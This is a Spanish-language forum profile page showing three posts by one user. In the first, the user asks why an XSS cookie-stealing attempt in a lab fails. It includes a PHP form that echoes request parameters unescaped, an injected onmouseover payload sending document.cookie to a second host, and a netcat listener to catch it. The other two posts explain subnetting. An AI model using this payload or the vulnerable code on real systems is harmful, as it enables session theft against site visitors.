Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - cascan

#1
Bugs y Exploits / XSS persistente - same origin
16 Febrero 2012, 21:49 PM
Hola a todos, estoy tratando de realizar un xss persistente y no logro dar con la solucion, probablemente es un problema de same origin...

esto es lo que tengo...

Tengo un server con:
------------------------------
<?php

if (isset($_GET['quantity'])) {

$quantity = $_GET['quantity'];
$item = $_GET['item'];

echo "You ordered ". $quantity . " " . $item . ".<br />";

setcookie("Ordering", $_GET['item'], time() + 31536000);
print_r($_COOKIE);
}


echo ('

<html><body>
<h4>Tizag Art Supply Order Form</h4>
<form action="y.php" method="get">
<select name="item">
<option>Paint</option>
<option>Brushes</option>
<option>Erasers</option>
</select>
Quantity: <input name="quantity" type="text" />
<input type="submit" />
</form>

</body></html>


');
?>

------------------------------

Tengo un browser que inyecta en el url:
http://10.10.10.10/prueba.php?item=Paint&quantity=999 <a onmouseover="document.location='http://10.10.10.20:5004/'document.cookie;">now </a>

Y tengo en 10.10.10.20 un nc -l -p 5004 en espera de la peticion

Cuando un maquina de la ip 10.10.10.30 ingresa a la 10.10.10.10 y pasa el mouse por "now" llega la informacion a netcat pero no la cookie....
Que hago mal? gracias
#2
Redes / Re: subneteo
22 Septiembre 2006, 17:07 PM
No entirndo muy bien lo que tratas de decir, cuando tu creas subredes, efectivamente se reduce la cantidad de host que trae por defecto la clase (en este caso CLASE C) que estas utilizando, debido a que se toma prestado bits que pertenecen originalmente a la parte de host, en relacion a esto "entre subred y subred no se van a poder ver", efectivamente, cuando quieres entregar un paquete que no esta dentro de tu subred, debes de configurar una purta de enlace que te permita ir entregando los paquetes que no pertenezcan a tu subred, de esta forma vas a poder llegar o encaminar paquetes a otras subredes.
#3
Redes / Re: subneteo
15 Septiembre 2006, 01:42 AM
tus calculos son correctos, la interpretacion que debes usar es la siguiente, como bien dijiste puedes crear 30 subredes de 6 host validos cada una, es decir puedes colocar en cada subred 6 PCs, o 5 PCs y un router etc, tu puedes tener tambien las 6 IP validas en una misma PC (jejje cosa loca no.. y como?... colocando 6 tarjetas de red en tu maquina), la idea es la siguiente, vas a tener 6 IP validas que puedes hacer uso de ellas como quieras, tanto para PC o colocarselas a un router, no te compliques tanto...
Tambien existen otros esquemas de direccionamientos que puedes usar, el que tu usaste se conoce como Subnetting o FLSM, tambien esta  VLSM, supernetting, y CIDR , busca info de ellos!!!! espero haber aclarado tu duda